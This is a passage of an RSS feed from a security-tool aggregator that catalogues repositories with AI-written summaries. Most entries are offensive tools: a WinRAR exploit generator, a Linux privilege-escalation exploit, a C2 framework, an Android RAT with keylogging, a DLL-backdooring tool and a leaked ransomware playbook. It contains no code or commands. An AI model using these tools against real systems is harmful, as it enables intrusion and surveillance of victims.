&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Claude Bug Bounty is an AI-powered agent harness tailored for professional bug bounty hunting, enabling users to streamline their testing processes. It intelligently orchestrates over 25 tools, remembers past findings across targets, validates vulnerabilities to reduce false positives, and generates ready-to-submit reports in under a minute. Notable features include Burp MCP integration for live traffic monitoring and an autonomous hunting mode that simplifies the testing workflow.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
&lt;img src="https://img.shields.io/badge/v3.0.0-Bionic_Hunter-blueviolet?style=for-the-badge" alt="v3.0.0"&gt;
&lt;h1 id="claude-bug-bounty"&gt;Claude Bug Bounty&lt;/h1&gt;
&lt;h3 id="the-ai-powered-agent-harness-for-professional-bug-bounty-hunting"&gt;The AI-Powered Agent Harness for Professional Bug Bounty Hunting&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Your AI copilot that sees live traffic, remembers past hunts, and hunts autonomously.&lt;/em&gt;&lt;/p&gt;</description></item><item><title>Cloakify</title><link>https://rainmana.github.io/hackyfeed/tools/trycatchhcf-cloakify/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trycatchhcf-cloakify/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CloakifyFactory is a tool designed for text-based steganography that transforms any file type into a list of innocuous strings, enabling covert data exfiltration and infiltration while evading detection by data loss prevention systems and analysts. Key features include the ability to cloak various file formats, social engineering capabilities to mislead security reviews, and the option to add noise for enhanced resistance against frequency analysis. It serves as an educational tool for introducing concepts of cryptography and steganography, though it is not secure for sensitive data without prior encryption.&lt;/p&gt;</description></item><item><title>cloud_enum</title><link>https://rainmana.github.io/hackyfeed/tools/initstring-cloud_enum/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/initstring-cloud_enum/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; cloud_enum is a multi-cloud OSINT tool designed for the enumeration of public resources across AWS, Azure, and Google Cloud Platform. Its notable features include the ability to identify open and protected cloud resources, such as S3 buckets, Azure storage accounts, and Firebase databases, utilizing customizable keyword inputs for comprehensive scanning. Although currently less maintained, the tool is positioned for migration to the Nuclei framework for improved functionality and community contributions.&lt;/p&gt;</description></item><item><title>CloudBrute</title><link>https://rainmana.github.io/hackyfeed/tools/0xsha-cloudbrute/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xsha-cloudbrute/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CloudBrute is a reconnaissance tool designed for uncovering infrastructure, files, and applications across major cloud providers, including Amazon, Google, Microsoft, and others. Its primary use case targets bug bounty hunters, red teamers, and penetration testers, providing features such as black-box detection, user-agent and proxy randomization, and modular customization to facilitate efficient cloud enumeration and vulnerability assessment without requiring authentication.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="cloudbrute"&gt;CloudBrute&lt;/h1&gt;
&lt;p&gt;A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.&lt;/p&gt;</description></item><item><title>console</title><link>https://rainmana.github.io/hackyfeed/tools/phasehq-console/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/phasehq-console/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Phase Console is an open-source platform designed for engineering teams to efficiently manage and secure application secrets throughout the development lifecycle. Its notable features include a comprehensive dashboard for secret management, role-based access control, seamless integration with various CI/CD platforms and Kubernetes, as well as SDK support for multiple programming languages, enabling secure secret injection and synchronization across environments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;!-- Phase Console --&gt;
 &lt;a href="https://phase.dev"&gt;
 &lt;img height="120" width="450" src="img/phase-lattice-logo.svg" alt="Phase"&gt;
 &lt;/a&gt;
 &lt;h5&gt;Repos&lt;/h5&gt;
 &lt;p&gt;
 &lt;a href="https://github.com/phasehq/docs"&gt;Docs&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/cli"&gt;CLI&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/node-sdk"&gt;Node SDK&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/python-sdk"&gt;Python SDK&lt;/a&gt;
 &lt;br/&gt;
 &lt;a href="https://github.com/phasehq/golang-sdk"&gt;Golang SDK&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/kubernetes-secrets-operator/tree/main/phase-console"&gt;Helm Chart&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/kubernetes-secrets-operator"&gt;Kubernetes Operator&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/terraform-provider-phase"&gt;Terraform Provider&lt;/a&gt;
 &lt;/p&gt;</description></item><item><title>conti-pentester-guide-leak</title><link>https://rainmana.github.io/hackyfeed/tools/forbiddenprogrammer-conti-pentester-guide-leak/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/forbiddenprogrammer-conti-pentester-guide-leak/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;conti-pentester-guide-leak&amp;rdquo; repository serves as an archive for leaked pentesting materials associated with the Conti ransomware group, providing insights into their methodologies and tools. It includes guides on a variety of techniques such as data exfiltration, network exploitation, and the usage of tools like Metasploit and Cobalt Strike. This material is aimed at enhancing pentesting skills for security professionals and aiding defenders in detecting and mitigating similar attacks, while emphasizing its usage for educational purposes only.&lt;/p&gt;</description></item><item><title>Corsy</title><link>https://rainmana.github.io/hackyfeed/tools/s0md3v-corsy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/s0md3v-corsy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Corsy is a lightweight CORS misconfiguration scanner designed to identify vulnerabilities in web applications&amp;rsquo; Cross-Origin Resource Sharing implementations. It features a versatile command-line interface that supports scanning URLs directly or from files, utilizes customizable HTTP headers, and provides options for threading, request delays, and exporting results to JSON. Notably, it implements a comprehensive suite of tests to uncover various CORS-related bypass opportunities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;br&gt;
 &lt;a href="https://github.com/s0md3v/Corsy"&gt;&lt;img src="https://i.ibb.co/K0Z7X99/corsy.png" alt="Corsy"&gt;&lt;/a&gt;
 &lt;br&gt;
 Corsy
 &lt;br&gt;
&lt;/h1&gt;
&lt;h4 align="center"&gt;CORS Misconfiguration Scanner&lt;/h4&gt;
&lt;p align="center"&gt;
 &lt;a href="https://github.com/s0md3v/Corsy/releases"&gt;
 &lt;img src="https://img.shields.io/github/release/s0md3v/Corsy.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/s0md3v/Corsy/issues?q=is%3Aissue+is%3Aclosed"&gt;
 &lt;img src="https://img.shields.io/github/issues-closed-raw/s0md3v/Corsy.svg"&gt;
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Covenant</title><link>https://rainmana.github.io/hackyfeed/tools/cobbr-covenant/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cobbr-covenant/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Covenant is a .NET command and control framework designed for red teaming, facilitating offensive .NET tradecraft and collaborative operations through a web-based interface. It supports cross-platform functionality across Linux, MacOS, and Windows, and features multi-user collaboration, dynamic C# compilation, inline code execution, and secure communication via an encrypted key exchange. Notably, Covenant offers API-driven extensibility and a user-friendly dashboard that allows red teamers to execute and manage operations effectively.&lt;/p&gt;</description></item><item><title>CrossLinked</title><link>https://rainmana.github.io/hackyfeed/tools/m8sec-crosslinked/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m8sec-crosslinked/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CrossLinked is a LinkedIn enumeration tool that leverages search engine scraping to extract valid employee names from targeted organizations, enabling enumeration without the need for API keys or direct LinkedIn access. It supports customizable naming conventions for output formatting and offers features like proxy rotation and the ability to parse data into both text and CSV files. This tool is particularly useful for security researchers and penetration testers looking to gather information about potential targets.&lt;/p&gt;</description></item><item><title>CS7038-Malware-Analysis</title><link>https://rainmana.github.io/hackyfeed/tools/ckane-cs7038-malware-analysis/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ckane-cs7038-malware-analysis/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CS7038-Malware-Analysis is a repository designed for educational purposes in the field of malware analysis, specifically for the University of Cincinnati&amp;rsquo;s course. It serves as a comprehensive resource for students, providing access to course materials and related multimedia content, including instructional videos on malware analysis techniques and methodologies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="cs7038-malware-analysis"&gt;CS7038-Malware-Analysis&lt;/h1&gt;
&lt;p&gt;Course Repository for University of Cincinnati Malware Analysis Class (CS[567]038)&lt;/p&gt;
&lt;p&gt;Public URL: &lt;a href="https://class.malware.re/"&gt;https://class.malware.re/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;YouTube Videos: &lt;a href="https://www.youtube.com/channel/UC0qfXmyAbSsmnisGQn1fAJA"&gt;https://www.youtube.com/channel/UC0qfXmyAbSsmnisGQn1fAJA&lt;/a&gt;&lt;/p&gt;</description></item><item><title>CTF-notes</title><link>https://rainmana.github.io/hackyfeed/tools/shiva108-ctf-notes/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/shiva108-ctf-notes/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The CTF-notes repository provides a comprehensive collection of resources and structured notes aimed at aiding individuals in preparing for Capture The Flag (CTF) competitions and penetration testing exams, such as the OSCP. It includes detailed checklists, exploitation techniques for various platforms, vulnerability payloads, and methodologies for offensive security. Noteworthy features include organized sections for post-exploitation tactics, memory forensics, and specific vulnerabilities, alongside a dedicated cheat sheet repository for quick reference during assessments.&lt;/p&gt;</description></item><item><title>CTFCrackTools</title><link>https://rainmana.github.io/hackyfeed/tools/0chencc-ctfcracktools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0chencc-ctfcracktools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CTFCrackTools X is a next-generation, node-based toolkit designed for CTF (Capture The Flag) competitions, offering an extensive set of over 43 built-in algorithms for encoding, cryptography, and hashing. Key features include a visual workflow that allows users to construct custom encoding and decoding processes intuitively, and native support across Windows, macOS, and Linux platforms without the need for additional runtime installations. The tool emphasizes performance and extensibility, streamlining the process of handling various CTF challenges.&lt;/p&gt;</description></item><item><title>ctftool</title><link>https://rainmana.github.io/hackyfeed/tools/taviso-ctftool/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/taviso-ctftool/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ctftool is an interactive command-line tool designed for exploring and experimenting with the CTF protocol used in Windows for Text Services. Its primary use case includes studying Windows internals, debugging Text Input Processors, and analyzing security within the CTF environment, with notable features such as support for scripting, automated interactions, and various commands for managing connections and clients. The tool is compatible with Windows 7, 8, and 10, supporting both 32-bit and x64 architectures.&lt;/p&gt;</description></item><item><title>cve</title><link>https://rainmana.github.io/hackyfeed/tools/trickest-cve/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trickest-cve/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The CVE PoC tool aggregates nearly every publicly available Proof-of-Concept (PoC) for Common Vulnerabilities and Exposures (CVEs), providing a comprehensive database of exploits for security professionals. It employs automated workflows to scrape and validate CVE details from various sources, including GitHub and HackerOne reports, while also allowing users to browse, search, and monitor PoCs for specific vulnerabilities. Noteworthy features include real-time updates, easy-to-read markdown documentation, and the ability to generate GitHub badges for affected software versions.&lt;/p&gt;</description></item><item><title>CVE-2023-38831-winrar-exploit</title><link>https://rainmana.github.io/hackyfeed/tools/b1tg-cve-2023-38831-winrar-exploit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/b1tg-cve-2023-38831-winrar-exploit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The CVE-2023-38831 winrar exploit generator is a tool designed to create proof-of-concept (PoC) exploits for a recently discovered vulnerability in WinRAR versions up to 6.22. It allows users to customize bait files, such as images or documents, along with malicious script files to generate a malicious RAR archive. Notable features include an easy-to-use command-line interface for generating exploits and the ability to customize payloads according to user specifications.&lt;/p&gt;</description></item><item><title>CVE-2024-1086</title><link>https://rainmana.github.io/hackyfeed/tools/notselwyn-cve-2024-1086/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/notselwyn-cve-2024-1086/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CVE-2024-1086 is a universal local privilege escalation exploit targeting Linux kernels from v5.14 to v6.6, with a notable success rate of 99.4% in KernelCTF environments. It allows users to gain root access under specific conditions related to user namespaces and kernel configurations, while also showcasing a deliberate kernel panic after execution to deter malicious exploitation. The tool includes both source code for building as well as a compiled binary for ease of use.&lt;/p&gt;</description></item><item><title>CyberStrikeAI</title><link>https://rainmana.github.io/hackyfeed/tools/ed1s0nz-cyberstrikeai/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ed1s0nz-cyberstrikeai/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CyberStrikeAI is an AI-integrated security testing platform developed in Go, designed for automated vulnerability discovery and attack-chain analysis. It features a vast integration of over 100 security tools, AI-driven orchestration, role-based testing, and lifecycle management to create a collaborative and auditable environment for security teams. Notable features include a web console, AI decision engine with OpenAI compatibility, detailed vulnerability management, and a comprehensive knowledge base for enhanced security expertise.&lt;/p&gt;</description></item><item><title>ddisasm</title><link>https://rainmana.github.io/hackyfeed/tools/grammatech-ddisasm/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/grammatech-ddisasm/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DDisasm is a high-performance disassembler that accurately translates binaries from ELF and PE formats into a reassemblable assembly code representation using the GTIRB intermediate format. Utilizing the Datalog declarative logic programming language, it derives code locations, symbolization, and function boundaries, supporting multiple instruction set architectures including x86, ARM, and MIPS. Notable features include Docker support for easy setup and integration with GTIRB for further binary analysis and manipulation.&lt;/p&gt;</description></item><item><title>Decepticon</title><link>https://rainmana.github.io/hackyfeed/tools/purpleailab-decepticon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/purpleailab-decepticon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Decepticon is a Vibe Hacking agent designed to streamline the red teaming process by utilizing AI to automate repetitive tasks such as scanning, service enumeration, and executing multi-stage attacks. Its primary use case is in penetration testing, where it simulates real-world attack scenarios to evaluate an organization&amp;rsquo;s security posture effectively. Notable features include the ability to handle the full kill chain, integrate with AI API keys, and operate within a Docker environment for ease of deployment.&lt;/p&gt;</description></item><item><title>DedSec</title><link>https://rainmana.github.io/hackyfeed/tools/dedsec1121fk-dedsec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dedsec1121fk-dedsec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The DedSec Project is an educational toolkit designed for Android using Termux, integrating various scripts, utilities, and local web interfaces to facilitate learning about cybersecurity tools and workflows. It aims to enhance users&amp;rsquo; understanding of defensive awareness through practical exercises and organized scripts, while supporting both English and Greek interfaces. Notable features include a comprehensive installation guide, diverse categories of tools, and a focus on educational usage, including personal information capture and simulated environments.&lt;/p&gt;</description></item><item><title>deepce</title><link>https://rainmana.github.io/hackyfeed/tools/stealthcopter-deepce/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/stealthcopter-deepce/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DeepCE is a lightweight tool designed for Docker container enumeration, privilege escalation, and container escapes, written in pure shell script to maximize compatibility. It performs a variety of enumerations, including container-specific data collection and host system scanning, and offers multiple exploits such as Docker group privilege escalation and command execution in privileged mode. Notably, DeepCE minimizes disk writes during enumeration, making it suitable for stealthy assessments in containerized environments.&lt;/p&gt;</description></item><item><title>DeepTraffic</title><link>https://rainmana.github.io/hackyfeed/tools/echowei-deeptraffic/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/echowei-deeptraffic/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DeepTraffic is a toolkit that employs deep learning models specifically for the classification of network traffic, focusing on identifying malware and anomalies. Its primary application lies in enhancing cybersecurity measures through effective traffic analysis and representation learning using convolutional neural networks. Notable features include end-to-end encrypted traffic classification and the ability to learn hierarchical spatial-temporal features for improved intrusion detection.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="deep-learning-models-for-network-traffic-classification"&gt;Deep Learning models for network traffic classification&lt;/h1&gt;
&lt;p&gt;For more information please read our papers.&lt;br&gt;&lt;/p&gt;</description></item><item><title>DEFCON-31-Syscalls-Workshop</title><link>https://rainmana.github.io/hackyfeed/tools/virtualalllocex-defcon-31-syscalls-workshop/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/virtualalllocex-defcon-31-syscalls-workshop/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The DEFCON 31 Syscalls Workshop repository provides educational materials focusing on direct and indirect syscalls within Windows operating systems, particularly aimed at enhancing understanding of Win32 and Native APIs for Red Team activities. It includes theoretical content, practical exercises, and proof of concepts (POCs) to facilitate learning about syscall mechanisms and their implications in EDR evasion. Notable features include an emphasis on manual techniques over complex automation, offering foundational insights into call stacks and shellcode execution dynamics.&lt;/p&gt;</description></item><item><title>dep-scan</title><link>https://rainmana.github.io/hackyfeed/tools/owasp-dep-scan-dep-scan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/owasp-dep-scan-dep-scan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OWASP dep-scan is an advanced security audit tool designed for analyzing project dependencies against known vulnerabilities, advisories, and license issues, applicable to both local repositories and container images. Its primary use case is to facilitate integration within Application Security Posture Management (ASPM) and Vulnerability Management (VM) platforms, especially in Continuous Integration (CI) environments. Notable features include advanced reachability analysis, fast local vulnerability scanning without a server, generation of Software Bills of Materials (SBOM), and clear insights for prioritization of vulnerabilities.&lt;/p&gt;</description></item><item><title>destroylist</title><link>https://rainmana.github.io/hackyfeed/tools/phishdestroy-destroylist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/phishdestroy-destroylist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Destroylist is a comprehensive phishing and scam domain blacklist that provides real-time threat intelligence to protect users globally. This tool maintains an extensive database of over 100,000 phishing domains and features active statistics on domain additions and removals, ensuring up-to-date protection against online threats. The repository supports community contributions, fostering collaborative efforts in enhancing online security.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="destroylist-phishing--scam-domain-blacklist"&gt;&lt;img src="https://raw.githubusercontent.com/Tarikul-Islam-Anik/Animated-Fluent-Emojis/master/Emojis/Activities/Performing%20Arts.png" alt="Performing Arts" width="28" height="28" /&gt; Destroylist: Phishing &amp;amp; Scam Domain Blacklist&lt;/h1&gt;
&lt;p&gt;&lt;img src="scripts/destroyolist_image.png" alt="Destroyolist Illustration"&gt;&lt;/p&gt;</description></item><item><title>device-activity-tracker</title><link>https://rainmana.github.io/hackyfeed/tools/gommzystudio-device-activity-tracker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gommzystudio-device-activity-tracker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Device Activity Tracker is a proof-of-concept tool designed for the analysis of WhatsApp and Signal user activity through Round-Trip Time (RTT) measurement of message delivery receipts. Its primary use case is to uncover privacy vulnerabilities in these messaging apps by detecting user activity levels, device state, and potential location changes, all while presenting real-time data through an accessible web interface. Notable features include an easy setup via Docker, a client-server architecture, and a CLI option for direct tracking of WhatsApp users.&lt;/p&gt;</description></item><item><title>devops-tools</title><link>https://rainmana.github.io/hackyfeed/tools/techiescamp-devops-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/techiescamp-devops-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;devops-tools&amp;rdquo; repository is a curated compilation of the most effective and popular DevOps tools for 2024, aimed at enhancing development and operational workflows. It categorizes tools into various segments such as Continuous Integration, Containerization, and Monitoring, providing brief descriptions to assist users in identifying the right tools for their needs. Notably, the repository encourages community contributions to continuously improve the list of resources available.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="curated-list-of-best-devops-tools-for-2024"&gt;Curated List of Best DevOps Tools for 2024&lt;/h1&gt;
&lt;p&gt;A curated collection of the most effective and popular DevOps tools to streamline your development and operations processes for 2024&lt;/p&gt;</description></item><item><title>dexcalibur</title><link>https://rainmana.github.io/hackyfeed/tools/frenchyeti-dexcalibur/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/frenchyeti-dexcalibur/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dexcalibur is an advanced Android reverse engineering platform that focuses on automating dynamic instrumentation for improved analysis. Its notable features include the ability to decompile and disassemble intercepted bytecode at runtime, manage multiple hooks, and perform static analysis with its built-in engine capable of executing smali code. This tool is designed to streamline the tedious tasks associated with dynamic analysis, making it essential for security researchers and developers.&lt;/p&gt;</description></item><item><title>discover</title><link>https://rainmana.github.io/hackyfeed/tools/leebaird-discover/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/leebaird-discover/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Discover is a customizable suite of bash scripts designed to automate various tasks in penetration testing, including recon, scanning, enumeration, and malicious payload creation with Metasploit, ideal for use on Kali Linux or Ubuntu systems. Notable features include multiple reconnaissance options for domains and persons, automated scanning tools that utilize Nmap and other utilities, and web application testing facilities incorporating tools like Nikto and SSL analysers. The tool simplifies complex penetration testing workflows through an organized menu structure, enabling swift task execution.&lt;/p&gt;</description></item><item><title>DllShimmer</title><link>https://rainmana.github.io/hackyfeed/tools/print3m-dllshimmer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/print3m-dllshimmer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DllShimmer is a tool designed to facilitate DLL hijacking by allowing users to backdoor any function in a DLL without disrupting the normal operation of the host program. It generates proxy DLLs through a boilerplate C++ file and a corresponding &lt;code&gt;.def&lt;/code&gt; file, ensuring that all exported functions maintain their original names and ordinal numbers, thus avoiding detection. Key features include support for both dynamic and static linking, the option to prevent multiple executions of the backdoor, and comprehensive debug logging capabilities.&lt;/p&gt;</description></item><item><title>dnsgen</title><link>https://rainmana.github.io/hackyfeed/tools/alephnullsk-dnsgen/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alephnullsk-dnsgen/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DNSGen 2.0 is an advanced DNS name permutation engine tailored for security researchers and penetration testers, facilitating subdomain discovery and security assessments through the generation of intelligent domain name variations. Notable features include a smart domain name permutation engine, support for custom wordlists, multiple sophisticated permutation techniques such as word affixing and cloud-specific patterns, and integration capabilities with tools like MassDNS for efficient domain resolution.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="dnsgen-20---advanced-dns-name-permutation-engine-"&gt;DNSGen 2.0 - Advanced DNS Name Permutation Engine 🚀&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://opensource.org/licenses/MIT"&gt;&lt;img src="https://img.shields.io/badge/License-MIT-yellow.svg" alt="License: MIT"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/"&gt;&lt;img src="https://img.shields.io/badge/python-3.7+-blue.svg" alt="Python 3.9+"&gt;&lt;/a&gt;
&lt;a href="https://github.com/psf/black"&gt;&lt;img src="https://img.shields.io/badge/code%20style-black-000000.svg" alt="Code style: black"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>DogeRat</title><link>https://rainmana.github.io/hackyfeed/tools/shivaya-dav-dogerat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/shivaya-dav-dogerat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DogeRat is an advanced Android remote administration tool (RAT) that enables real-time control over Android devices through a Telegram-based interface without the need for port forwarding. Notable features include the ability to send and receive messages, capture multimedia, access location data, manage contacts, and utilize keylogger functionality, with additional capabilities available in its paid version, such as encryption and undetectable injections. The tool is intended solely for educational purposes and boasts a comprehensive set of functionalities for thorough device management.&lt;/p&gt;</description></item><item><title>domloggerpp</title><link>https://rainmana.github.io/hackyfeed/tools/kevin-mizu-domloggerpp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kevin-mizu-domloggerpp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DOMLoggerpp is a browser extension designed for monitoring, intercepting, and debugging JavaScript sinks through customizable configurations. It features regex-based domain management, flexible hooking options, on-demand debugging breakpoints, a dynamic notification system, and an integrated Devtools log panel for enhanced log management and filtering. This tool is especially useful for developers and security professionals looking to analyze and debug JavaScript execution flows within web applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="./.github/banner.png" width="80%"&gt;&lt;br&gt;
 A browser extension that allows you to monitor, intercept, and debug JavaScript sinks based on customizable configurations.
 &lt;br&gt;
 &lt;img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/kevin-mizu/DOMLoggerpp"&gt;
 &lt;a href="https://twitter.com/intent/follow?screen_name=kevin_mizu" title="Follow"&gt;&lt;img src="https://img.shields.io/twitter/follow/podalirius_?label=kevin_mizu&amp;style=social"&gt;&lt;/a&gt;
 &lt;br&gt;
